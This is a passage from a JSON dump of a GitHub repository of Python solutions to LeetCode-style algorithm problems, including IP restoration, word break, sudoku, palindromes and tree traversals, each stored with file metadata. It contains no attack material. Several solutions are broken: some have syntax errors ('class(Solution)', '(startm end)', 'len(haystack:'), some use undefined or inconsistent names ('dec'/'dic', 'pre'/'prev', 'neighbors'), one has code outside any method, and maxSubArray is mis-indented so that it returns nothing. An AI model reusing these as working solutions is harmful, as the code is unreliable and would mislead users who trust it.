stack:\n\t\t\tif not root:\n\t\t\t\troot = stack.pop()\n\t\t\tresult.append(root.val)\n\t\t\tif root.right:\n\t\t\t\tstack.append(root.right)\n\t\t\troot = root.left\n\t\treturn result\n\t\t" }, { "alpha_fraction": 0.5459272265434265, "alphanum_fraction": 0.580589234828949, "avg_line_length": 27.600000381469727, "blob_id": "a893acf177755b73e25f749f4c27a9fbce962a68", "content_id": "fad69322341c9df28d655a46ff7c93edadf73787", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 577, "license_type": "permissive", "max_line_length": 68, "num_lines": 20, "path": "/Part4/Restore_IP_Address.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef restoreIpAddress(self, s):\n\t\tresult = []\n\t\tself._restoreIpAddress(0, s, [], result)\n\t\treturn result\n\n\tdef _restoreIpAddress(self, length, s, ips, result):\n\t\tif not s:\n\t\t\tif length == 4:\n\t\t\t\tresult.append('.'.join(ips))\n\t\t\treturn\n\t\telif length == 4:\n\t\t\treturn\n\t\tself._restoreIpAddress(length + 1, s[1:], ips + [s[:1]], result)\n\n\t\tif s[0] != '0':\n\t\t\tif len(s) >= 2:\n\t\t\t\tself._restoreIpAddress(length + 1, s[2:], ips + [s[:2]], 
result)\n\t\t\tif len(s) >= 3 and int(s[:3]) <= 255:\n\t\t\t\tself._restoreIpAddress(length + 1, s[3:], ips + [s[:3]], result)\n\t\t\t\t\n" }, { "alpha_fraction": 0.5757575631141663, "alphanum_fraction": 0.5946969985961914, "avg_line_length": 19.384614944458008, "blob_id": "b2be7cc09afd4ef81db54ad2f365c2955b0fcd7a", "content_id": "81e2fa1a626025d49a09179f24f36f15c8b5a4c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 264, "license_type": "no_license", "max_line_length": 29, "num_lines": 13, "path": "/Part2/Maximum_Subarray.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef maxSubArray(self, nums):\n\t\tif not nums:\n\t\t\treturn 0\n\t\t\tlength = len(nums)\n\t\t\tcurrent = nums[0]\n\t\t\tm = current\n\t\t\tfor i in range(1, length):\n\t\t\t\tif current < 0:\n\t\t\t\t\tcurrent = 0\n\t\t\t\tcurrent += nums[i]\n\t\t\t\tm = max(current, m)\n\t\t\treturn m" }, { "alpha_fraction": 0.5045592784881592, "alphanum_fraction": 0.5227963328361511, "avg_line_length": 22.35714340209961, "blob_id": "711cbe479b3764d46212dc39c2f6c855b3058b51", "content_id": "7faa9de238d328aa23b09cb40003b439e8637b23", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 329, "license_type": "no_license", "max_line_length": 43, "num_lines": 14, "path": "/Part2/Search_A_2D_Matrix.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef searchMatrix(self, matrix, target):\n\t\tm = len(matrix)\n\t\tn = len(matrix[0])\n\t\tl, h = 0, m * n - 1\n\t\twhile l <= h:\n\t\t\tmid = l + (h - l) // 2\n\t\t\tif matrix[mid // n][mid % n] == target:\n\t\t\t\treturn True\n\t\t\telif matrix[mid // n][mid % n] < target:\n\t\t\t\tl = mid + 1\n\t\t\telse:\n\t\t\t\th = mid - 1\n\t\treturn False\n\t\t" }, { "alpha_fraction": 0.5522041916847229, "alphanum_fraction": 0.5522041916847229, "avg_line_length": 16.875, "blob_id": "b29369c8a4a061d3c1641b1f9e2f5df960b32d34", "content_id": "31b4298266be07b398820484c477ddd29cafd4bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 431, "license_type": "no_license", "max_line_length": 37, "num_lines": 24, "path": "/Part3/Word_Break_2.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "import collections\n\nclass Solution(object):\n\tdef wordBreak(self, s, wordDict):\n\t\tdec = collections.defaultdict(list)\n\n\t\tdef dfs(s):\n\t\t\tif not s:\n\t\t\t\treturn [None]\n\t\t\tif s in dic:\n\t\t\t\treturn dic[s]\n\t\t\tres = []\n\n\t\t\tfor word in wordDict:\n\t\t\t\tn = len(word)\n\t\t\t\tif s[:n] == word:\n\t\t\t\t\tfor r in dfs(s[n:]):\n\t\t\t\t\t\tif r:\n\t\t\t\t\t\t\tres.append(word + \" \" + r)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tres.append(word)\n\t\t\tdic[s] = res\n\t\t\treturn res\n\t\treturn dfs(s)\n\t\t" }, { "alpha_fraction": 0.6146435737609863, "alphanum_fraction": 0.6204239130020142, "avg_line_length": 17.464284896850586, "blob_id": "d93e2d205a3052ffbdd4d875e32a72fb7132d1e2", "content_id": "c645909de239869b520edef020089894593986f0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 519, "license_type": "no_license", "max_line_length": 38, "num_lines": 28, "path": "/Part3/Minimum_Depth_of_Binary_Tree.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class TreeNode(object):\n\tdef __init__(self, 
x):\n\t\tself.val = x\n\t\tself.left = None\n\t\tself.right = None\n\n\nclass Solution(object):\n\tdef minDepth(self, root):\n\t\tif root is None:\n\t\t\treturn 0\n\n\t\tdepth, curr_level = 0, [root]\n\t\twhile curr_level:\n\t\t\tdepth += 1\n\t\t\tnext_level = []\n\t\t\tfor n in curr_level:\n\t\t\t\tleft, right = n.left, n.right\n\n\t\t\t\tif left is None and right is None:\n\t\t\t\t\treturn depth\n\n\t\t\t\tif left:\n\t\t\t\t\tnext_level.append(left)\n\t\t\t\tif right:\n\t\t\t\t\tnext_level.append(right)\n\t\t\tcurr_level = next_level\n\t\treturn depth\n\t\t" }, { "alpha_fraction": 0.6133942008018494, "alphanum_fraction": 0.621004581451416, "avg_line_length": 24.153846740722656, "blob_id": "7b19b83f2939e5cc6910d60455ec738b22837249", "content_id": "6662563a4926bf606b44250341695da22c715ad5", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 657, "license_type": "permissive", "max_line_length": 53, "num_lines": 26, "path": "/Part4/Unique_Binary_Search_Trees_2.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class TreeNode(object):\n\tdef __init__(self, x):\n\t\tself.val = x\n\t\tself.left = None\n\t\tself.right = None\n\n\nclass Solution(object):\n\tdef generateTrees(self, n):\n\t\tif n == 0:\n\t\t\treturn []\n\t\tself.cache = {}\n\t\treturn self._generateTrees(1, n)\n\n\tdef _generateTrees(self, start, end):\n\t\tif (start, end) not in self.cache:\n\t\t\troots = []\n\t\t\tfor root in range(start, end + 1):\n\t\t\t\tfor left in self._generateTrees(start, root - 1):\n\t\t\t\t\tfor right in self._generateTrees(root + 1, end):\n\t\t\t\t\t\tnode = TreeNode(root)\n\t\t\t\t\t\tnode.left = left\n\t\t\t\t\t\tnode.right = right\n\t\t\t\t\t\troots.append(node)\n\t\t\tself.cache[(start, end)] = roots\n\t\treturn self.cache[(startm end)] or [None]\n\t\t\n" }, { "alpha_fraction": 0.5198019742965698, "alphanum_fraction": 0.5709571242332458, "avg_line_length": 20.571428298950195, "blob_id": "ce82756d29f239c6862f637ec9e49a099075e078", "content_id": "dc997d15453eb3327b30e9389af0bef3bdd96925", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 606, "license_type": "permissive", "max_line_length": 47, "num_lines": 28, "path": "/Part4/Multiply_Strings.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef multiply(self, num1, num2):\n\t\tnum1 = num1[::-1]\n\t\tnum2 = num2[::-1]\n\t\tlength1 = len(num1)\n\t\tlength2 = len(num2)\n\t\ttemp = [0 for __ in range(length1 + length2)]\n\n\t\tfor i in range(length1):\n\t\t\tfor j in range(length2):\n\t\t\t\ttemp[i + j] += int(num1[i]) * int(num2[j])\n\t\tcarry = 0\n\t\tdigits = []\n\n\t\tfor num in temp:\n\t\t\ts = carry + num\n\t\t\tcarry = s // 10\n\t\t\tdigits.append(str(s % 10))\n\t\tresult = \"\".join(digits)[::-1]\n\n\t\tsub_index = 0\n\t\tfor i in range(length1 + length2 -1):\n\t\t\tif result[i] == \"0\":\n\t\t\t\tsub_index += 1\n\t\t\telse:\n\t\t\t\tbreak\n\t\tresult = result[sub_index:]\n\t\treturn result\n\t\t" }, { "alpha_fraction": 0.6086021661758423, "alphanum_fraction": 0.6215053796768188, "avg_line_length": 21.899999618530273, "blob_id": "4b624875868eb3c48b82c7f99142db2d47e958ff", "content_id": "5bb818735d4bdd34fe0d88c0c5b3deccbf51f87b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 465, "license_type": "no_license", "max_line_length": 54, "num_lines": 20, "path": 
"/Part2/Implement_strStr(0.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef strStr(self, haystack, needle):\n\t\tif not needle:\n\t\t\treturn 0\n\t\tif not haystack:\n\t\t\treturn -1\n\t\ti = 0\n\t\tneedleLength = len(needle)\n\t\twhile i < len(haystack:\n\t\t\ta = haystack[i:i + needleLength]\n\t\t\tif haystack[i:i + needleLength] == needle:\n\t\t\t\treturn i\n\t\t\telse:\n\t\t\t\tindex = 0\n\t\t\t\ttry:\n\t\t\t\t\tindex = needle.rindex(haystack[i + needleLength])\n\t\t\t\texcept Exception:\n\t\t\t\t\ti += needleLength + 1\n\t\t\t\ti += needleLength - index\n\t\treturn -1\n\t\t\n\n\t\t\t" }, { "alpha_fraction": 0.5932203531265259, "alphanum_fraction": 0.6101694703102112, "avg_line_length": 28, "blob_id": "c06a154453b77c0d68b2f18049a48f8573b41f77", "content_id": "d41076abd93ea0a6467a5a896322dbc4c2381e71", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 118, "license_type": "no_license", "max_line_length": 51, "num_lines": 4, "path": "/Part2/Gray_code.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef grayCode(self, n):\n\t\tresult = [(i >> 1) ^ i for i in range(pow(2, n))]\n\t\treturn result\n\t\t" }, { "alpha_fraction": 0.5518394708633423, "alphanum_fraction": 0.5652173757553101, "avg_line_length": 18.799999237060547, "blob_id": "c22f8db5ba393a17dc84154c0c28b66b562b3d50", "content_id": "3da03b88880de295f2fcc44540bde203c162fc9f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 299, "license_type": "no_license", "max_line_length": 39, "num_lines": 15, "path": "/Part1/Palindrome_Partitioning.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef partition(self, s):\n\n\t\tif not s:\n\t\t\treturn [[]]\n\t\tresult = []\n\n\t\tfor i in range(len(s)):\n\t\t\tif self.isPalindrome(s[:i + 1]):\n\t\t\t\tfor r in self.partition(s[i + 1:]):\n\t\t\t\t\tresult.append([s[:i + 1]] + r)\n\t\treturn result\n\n\tdef isPalindrome(self, s):\n\t\treturn s == s[::-1]\n\t\t" }, { "alpha_fraction": 0.525798499584198, "alphanum_fraction": 0.5405405163764954, "avg_line_length": 19.399999618530273, "blob_id": "0cb9a2c1f856ce51fea5dc444ae01a0c020f969d", "content_id": "274a60034aef9148a2c27d3f16a18443f24242c8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 407, "license_type": "no_license", "max_line_length": 33, "num_lines": 20, "path": "/Part3/Add_Binary.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef addBinary(self, a, b):\n\t\tresult = []\n\t\tcarry = val = 0\n\t\tif len(a)< len(b):\n\t\t\ta, b =b, a\n\n\t\tlengthA = len(a)\n\t\tlengthB = len(b)\n\n\t\tfor i in range(lengthA):\n\t\t\tval = carry\n\t\t\tval += int(a[-(i + 1)])\n\t\t\tif i < lengthB:\n\t\t\t\tval += int(b[-(i + 1)])\n\t\t\tcarry, val = val // 2, val % 2\n\t\t\tresult.append(str(val))\n\t\tif carry:\n\t\t\tresult.append(str(carry))\n\t\treturn \"\".join(result[::-1])" }, { "alpha_fraction": 0.5397022366523743, "alphanum_fraction": 0.5669975280761719, "avg_line_length": 26.724138259887695, "blob_id": "cb5fb7c5373b8b2144fc141f04619c6bb1fb3850", "content_id": "c45ec3337dcea0d55ba23f76219cde4a7ed382d1", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 806, "license_type": 
"permissive", "max_line_length": 214, "num_lines": 29, "path": "/Part4/Sudoku_Solver.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef solveSudoku(self, board):\n\t\tfor row in range(9):\n\t\t\tboard[row] = list(board[row])\n\t\tself.recursive(0, 0, board)\n\t\tfor row in range(9):\n\t\t\tboard[row] = \"\".join(board[row])\n\n\n\tdef recursive(self, i, j, board):\n\t\tif j >= 9:\n\t\t\treturn self.recursive(i + 1, 0, board)\n\t\tif i == 9:\n\t\t\treturn True\n\n\t\tif board[i][j] == \".\":\n\t\t\tfor num in range(1, 10):\n\t\t\t\tnum_str = str(num)\n\n\n\t\t\t\tif all([board[i][col] != num_str for col in range(9)]) and all([board[row][j] != num_str for row in range(9)]) and all([board[i // 3 * 3 + count // 3][j // 3 * 3 + count % 3] != num_str for count in range(9)]):\n\t\t\t\t\tboard[i][j] = num_str\n\t\t\t\t\tif not self.recursive(i, j + 1, board):\n\t\t\t\t\t\tboard[i][j] = \".\"\n\t\t\t\t\telse:\n\t\t\t\t\t\treturn True\n\t\telse:\n\t\t\treturn self.recursive(i, j + 1, board)\n\t\treturn False\n\t\t" }, { "alpha_fraction": 0.4133226275444031, "alphanum_fraction": 0.4414125084877014, "avg_line_length": 22.037036895751953, "blob_id": "473b242a7656b382ca565b5dbaa707e787daa571", "content_id": "a1ed702dbb6279f3421966b36b29f507fbeae7ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1246, "license_type": "no_license", "max_line_length": 92, "num_lines": 54, "path": "/Part3/Longest_Palindromic_Substring.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class(Solution):\n\tdef longestPalindrome2(self, s):\n\t\tif not s:\n\t\t\treturn\n\t\tn = len(s)\n\t\tif n == 1:\n\t\t\treturn s\n\t\tl = r = m = c = 0\n\t\tb = True\n\t\tfor i in range(0, n):\n\t\t\tfor j in range(0, min(n - i, i + 1)):\n\t\t\t\tif (s[i - j] != s[i + j]):\n\t\t\t\t\tb = False\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tc = 2 * j + 1\n\t\t\tif (c > m):\n\t\t\t\tl = i - + 1 - b\n\t\t\t\tr = i + j + b\n\t\t\t\tm = c\n\t\t\t\tb = True\n\n\t\t\t\tfor j in range(0, min(n - i - 1, i + 1)):\n\t\t\t\t\tif(s[i - j] != s[i + j + 1]):\n\t\t\t\t\t\tb = False\n\t\t\t\t\t\tbreak\n\t\t\t\t\telse:\n\t\t\t\t\t\tc = 2 * j + 2\n\n\t\t\t\tif (c > m):\n\t\t\t\t\tl = i - j + 1 - b\n\t\t\t\t\tr = i + 1 + b\n\t\t\t\t\tm = c\n\t\t\t\tb = True\n\t\t\treturn s[l:r]\n\t\tdef longestPalindrome(self, s):\n\t\t\tstring = \"#\" + \"#\".join(s) + \"#\"\n\t\t\ti = 0\n\t\t\tmaxBorder = 0\n\t\t\tmaxCenter = 0\n\t\t\tp = [0 for __ in range(len(string))]\n\t\t\tres = [0, 0]\n\n\t\t\twhile i < len(string):\n\t\t\t\tp[i] = min(p[2 * maxCenter - i], maxBorder - i) if maxBorder > i else 1\n\t\t\t\twhile i - p[i] >= 0 and i + p[i] < len(string) and string[i - p[i]] == string[i + p[i]]:\n\t\t\t\t\tp[i] += 1\n\t\t\t\tif maxBorder < p[i] + i:\n\t\t\t\t\tmaxBorder = p[i] + i\n\t\t\t\t\tmaxCenter = i\n\t\t\t\t\tif maxBorder - maxCenter > res[1] - res[0]:\n\t\t\t\t\t\tres = [maxCenter, maxBorder]\n\t\t\t\ti += 1\n\t\t\treturn \"\".join([x for x in string[2 * res[0] - res[1] + 1 : res[1]] if x != '#'])\n \n" }, { "alpha_fraction": 0.6103286147117615, "alphanum_fraction": 0.6103286147117615, "avg_line_length": 17.39130401611328, "blob_id": "ed2e294372d31910fdd554f61bbb484393c53079", "content_id": "c19d37d8bf92d0b110a378c91516e1f284ff99db", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 426, "license_type": "no_license", "max_line_length": 37, "num_lines": 23, "path": 
"/Part1/Validate_Binary_Search_Tree.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class TreeNode(object):\n\tdef __init__(self, x):\n\t\tself.val = x\n\t\tself.left = None\n\t\tself.right = None\n\nclass Solution(object):\n\tdef isValidBST(self, root):\n\t\tstack = []\n\t\tcurr = root\n\t\tpre = None\n\t\twhile curr or stack:\n\t\t\twhile curr:\n\t\t\t\tstack.append(curr)\n\t\t\t\tcurr = curr.left\n\n\t\t\tif stack:\n\t\t\t\tcurr = stack.pop()\n\t\t\t\tif prev and curr.val <= prev.val:\n\t\t\t\t\treturn False\n\t\t\t\tprev = curr\n\t\t\t\tcurr = curr.right\n\t\treturn True\n\t\t\n" }, { "alpha_fraction": 0.5380434989929199, "alphanum_fraction": 0.5461956262588501, "avg_line_length": 22.0625, "blob_id": "e3a5289379f7dcf89dbdfa9337042cab06381b2e", "content_id": "8eaa57439496305eac7936afca5583937719d212", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 368, "license_type": "permissive", "max_line_length": 42, "num_lines": 16, "path": "/Part4/Smplify_Path.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef simplifyPath(self, path):\n\t\tparts = path.split(\"/\")\n\t\tresult = ['']\n\t\tfor part in parts:\n\t\t\tif part:\n\t\t\t\tif part not in ('.', '..'):\n\t\t\t\t\tif len(result) == 0:\n\t\t\t\t\t\tresult.append('')\n\t\t\t\t\tresult.append(part)\n\t\t\t\telif part == '..' and len(result) > 0:\n\t\t\t\t\tresult.pop()\n\t\tif len(result) < 2:\n\t\t\treturn \"/\"\n\t\telse:\n\t\t\treturn \"/\".join(result)" }, { "alpha_fraction": 0.5608465671539307, "alphanum_fraction": 0.5820105671882629, "avg_line_length": 22.5, "blob_id": "effa539821a2337cc7cf7662975eaf0bea3a60ca", "content_id": "60b373ec046b706888740824dfb7d027c02e3657", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 189, "license_type": "permissive", "max_line_length": 31, "num_lines": 8, "path": "/Part4/Excel_Sheet_Column_Title.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef convertToTitle(self, n):\n\t\tresult = []\n\t\tbase = ord('A')\n\t\twhile n:\n\t\t\tn, r = divmod(n - 1, 26)\n\t\t\tresult.append(chr(base + r))\n\t\treturn ''.join(result[::-1])\n\t" }, { "alpha_fraction": 0.5644699335098267, "alphanum_fraction": 0.593123197555542, "avg_line_length": 20.75, "blob_id": "600ac990da0e510ef45078c443e8156170a6cd65", "content_id": "f67215e465f7fd0287e9965bb82cfca0bf0811d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 349, "license_type": "no_license", "max_line_length": 70, "num_lines": 16, "path": "/Part1/First_Missing_Positive.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tif not nums:\n\t\treturn 1\n\ti = 0\n\tlength = len(nums)\n\twhile i < length:\n\t\tcurrent = nums[i]\n\t\tif current <= 0 or current > length or nums[current - 1] == current:\n\t\t\ti += 1\n\t\telse:\n\t\t\tnums[current - 1], nums[i] = nums[i], nums[current - 1] \n\n\tfor i in range(length):\n\t\tif nums[i] != i + 1:\n\t\t\treturn i + 1\n\treturn length + 1\n\n" }, { "alpha_fraction": 0.6552962064743042, "alphanum_fraction": 0.6552962064743042, "avg_line_length": 20.461538314819336, "blob_id": "72e8d0499e76b0b97e1979f6ef54b3240c3a5545", "content_id": "ea51869812211e16211699fc44b7f55bfd0d08c0", "detected_licenses": [ "Unlicense" ], "is_generated": 
false, "is_vendor": false, "language": "Python", "length_bytes": 557, "license_type": "permissive", "max_line_length": 34, "num_lines": 26, "path": "/Part4/Binary_Tree_Zigzag_Level_order_Traversal.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef zigzagLevelOrder(self, root):\n\t\tresult = []\n\t\tif not root:\n\t\t\treturn result\n\t\tcurr_level = [root]\n\t\tneed_reverse = False\n\n\t\twhile curr_level:\n\t\t\tlevel_result = []\n\t\t\tnext_level = []\n\t\t\tfor temp in curr_level:\n\t\t\t\tlevel_result.append(temp.val)\n\n\t\t\t\tif temp.left:\n\t\t\t\t\tnext_level.append(temp.left)\n\t\t\t\tif temp.right:\n\t\t\t\t\tnext_level.append(temp.right)\n\t\t\tif need_reverse:\n\t\t\t\tlevel_result.reverse()\n\t\t\t\tneed_reverse = False\n\t\t\telse:\n\t\t\t\tneed_reverse = True\n\t\t\tresult.append(level_result)\n\t\t\tcurr_level = next_level\n\t\treturn result" }, { "alpha_fraction": 0.579081654548645, "alphanum_fraction": 0.5943877696990967, "avg_line_length": 20.61111068725586, "blob_id": "e84e33fbd0314396db08597a9ad2b711915dab8e", "content_id": "ff44f4a2bb65ec3128cf6cd57e25b88f430ab13b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 392, "license_type": "no_license", "max_line_length": 41, "num_lines": 18, "path": "/Part3/Containner_With_Most_Water.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef maxArea(self, height):\n\t\tif not height:\n\t\t\treturn 0\n\t\tleft = 0\n\t\tright = len(height) - 1\n\t\tresult = 0\n\t\twhile left < right:\n\t\t\tif height[left] < height[right]:\n\t\t\t\tarea = height[left] * (right - left)\n\t\t\t\tresult = max(result, area)\n\t\t\t\tleft += 1\n\t\t\telse:\n\t\t\t\tarea = height[right] * (right - left)\n\t\t\t\tresult = max(result, area)\n\t\t\t\tright -= 1\n\n\t\treturn result\n\t\t\n" }, { "alpha_fraction": 0.6188679337501526, "alphanum_fraction": 0.6283018589019775, "avg_line_length": 22.954545974731445, "blob_id": "6660e44f317d593c77d45b8beb46d84db80e7b51", "content_id": "4f5e4356f7bc4807d21b0273caf4dc882a06d94c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 530, "license_type": "no_license", "max_line_length": 58, "num_lines": 22, "path": "/Part1/Merge_Intervals.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Interval(object):\n\tdef __init__(self, s=0, e =0):\n\t\tself.start = s\n\t\tself.end = e\n\n\tdef __str(self):\n\t\treturn \"[\" + str(self.start) + \",\" + str(self.end) + \"]\"\n\nclass Solution(object):\n\tdef merge(self, intervals):\n\t\tresult = []\n\t\tif not intervals:\n\t\t\treturn result\n\t\tintervals.sort(key = lambda x: x.start)\n\t\tresult.append(intervals[0])\n\t\tfor Interval in intervals[1:]:\n\t\t\tprev = result[-1]\n\t\t\tif prev.end >= Interval.start:\n\t\t\t\tprev.end = max(prev.end, Interval.end)\n\t\t\telse:\n\t\t\t\tresult.append(Interval)\n\t\treturn result\n\t\t\n" }, { "alpha_fraction": 0.44813278317451477, "alphanum_fraction": 0.48547717928886414, "avg_line_length": 21, "blob_id": "c469009e2c51981f08450cb84de033567cb24e50", "content_id": "7aea3aaa1725c49287ec5779f320e5ccb8671b07", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 241, "license_type": "no_license", "max_line_length": 33, "num_lines": 11, "path": "/Part2/Distinct_Subsequences.py", "repo_name": "SreecharanG/Personal_Work", 
"src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef numDistinct(self, s, t):\n\t\tm = len(s)\n\t\tn = len(t)\n\t\tdp = [0 for __ in range(n + 1)]\n\t\tdp[0] = 1\n\t\tfor i in range(m):\n\t\t\tfor j in range(n - 1, -1, -1):\n\t\t\t\tif t[j] == s[i]:\n\t\t\t\t\tdp[j + 1] += dp[j]\n\t\treturn dp[-1]" }, { "alpha_fraction": 0.5851648449897766, "alphanum_fraction": 0.6071428656578064, "avg_line_length": 21.625, "blob_id": "2588662d0d1ed974f9c9c379489006fb51bda164", "content_id": "ce909733dcb82a71defaf3cac31f3a4c5d0faa55", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 364, "license_type": "no_license", "max_line_length": 36, "num_lines": 16, "path": "/Part2/Longest_Consecutive_Sequence.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef longestConsecutive(self, nums):\n\t\tnumset, maxlen = set(nums), 0\n\t\tfor n in set(nums):\n\t\t\tcurrlen, tmp = 1, n + 1\n\t\t\twhile tmp in numset:\n\t\t\t\tcurrlen += 1\n\t\t\t\tnumset.discard(tmp)\n\t\t\t\ttmp += 1\n\t\t\ttmp = n - 1\n\t\t\twhile tmp in numset:\n\t\t\t\tcurrlen += 1\n\t\t\t\tnumset.discard(tmp)\n\t\t\t\ttmp -= 1\n\t\t\tmaxlen = max(maxlen, currlen)\n\t\treturn maxlen\n\t\t" }, { "alpha_fraction": 0.6742857098579407, "alphanum_fraction": 0.6742857098579407, "avg_line_length": 23.904762268066406, "blob_id": "4c13785612b651dd65da25a9aab993cc01d400be", "content_id": "d8dc61ceccc72223542f7133b4165d6e896cd855", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 525, "license_type": "permissive", "max_line_length": 57, "num_lines": 21, "path": "/Part4/Clone_Graph.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class UndirectedGraphNode(object):\n\tdef __init__(self, x):\n\t\tself.label = x\n\t\tself.neighbors = []\n\nclass Solution(object):\n\tdef cloneGraph(self, node):\n\t\tif not node:\n\t\t\treturn node\n\t\tvisited = {}\n\t\tfirst = UndirectedGraphNode(node.label)\n\t\tvisited[node.label] = first\n\t\tstack = [node]\n\t\twhile stack:\n\t\t\ttop = stack.pop()\n\t\t\tfor n in neighbors:\n\t\t\t\tif n.label not in visited:\n\t\t\t\t\tvisited[n.label] = UndirectedGraphNode(n.label)\n\t\t\t\t\tstack.append(n)\n\t\t\t\tvisited[top.label].neighbors.append(visited[n.label])\n\t\treturn first\n\t\t" }, { "alpha_fraction": 0.5488029718399048, "alphanum_fraction": 0.55064457654953, "avg_line_length": 23.590909957885742, "blob_id": "016a198808d43ccab6e4791fada11eec75775f88", "content_id": "79b7a88fef6affd80c31b0da3023a52328384a87", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 543, "license_type": "permissive", "max_line_length": 48, "num_lines": 22, "path": "/Part4/Evaluate_Reverse_Polish_Notation.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef evalRPN(self, tokens):\n\t\tstack = []\n\t\tfor token in tokens:\n\t\t\tif token not in (\"+\", \"-\", \"*\", \"/\"):\n\t\t\t\tstack.append(int(token))\n\n\t\t\telse:\n\t\t\t\tsecond = stack.pop()\n\t\t\t\tfirst = stack.pop()\n\t\t\t\tif token == \"+\":\n\t\t\t\t\tstack.append(first + second)\n\t\t\t\telif token == \"-\":\n\t\t\t\t\tstack.append(first - second)\n\t\t\t\telif token == '*':\n\t\t\t\t\tstack.append(first * second)\n\t\t\t\telse:\n\t\t\t\t\tif first * second < 0:\n\t\t\t\t\t\tstack.append(-(abs(first) // 
abs(second)))\n\t\t\t\t\telse:\n\t\t\t\t\t\tstack.append(first // second)\n\t\treturn stack.pop()\n\t\t" }, { "alpha_fraction": 0.6739726066589355, "alphanum_fraction": 0.6767123341560364, "avg_line_length": 23.200000762939453, "blob_id": "4b8d639526bec2c20ac05cf47f830f2eb5cd6489", "content_id": "79950483472e2a66b566acce247b1aecfd8bb95d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 365, "license_type": "no_license", "max_line_length": 76, "num_lines": 15, "path": "/Part2/Path_Sum.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class TreeNode(object):\n\tdef __init__(self, x):\n\t\tself.val = x\n\t\tself.left = None\n\t\tself.right = None\n\nclass Solution(object):\n\tdef hasPathSum(self, root, sum):\n\t\tif not root:\n\t\t\treturn False\n\n\t\tsum -= root.val\n\t\tif sum == 0 and root.left is None and root.right is None:\n\t\t\treturn True\n\t\treturn self.hasPathSum(root.left, sum) or self.hasPathSum(root.right, sum)\n\t\t" }, { "alpha_fraction": 0.635152280330658, "alphanum_fraction": 0.6364213228225708, "avg_line_length": 32.553192138671875, "blob_id": "6623ed8b14dece63fc77ac47a034478a360edbfa", "content_id": "f9b3546cd9c6034c63e52de5d7e6763c3f7c414e", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1576, "license_type": "permissive", "max_line_length": 76, "num_lines": 47, "path": 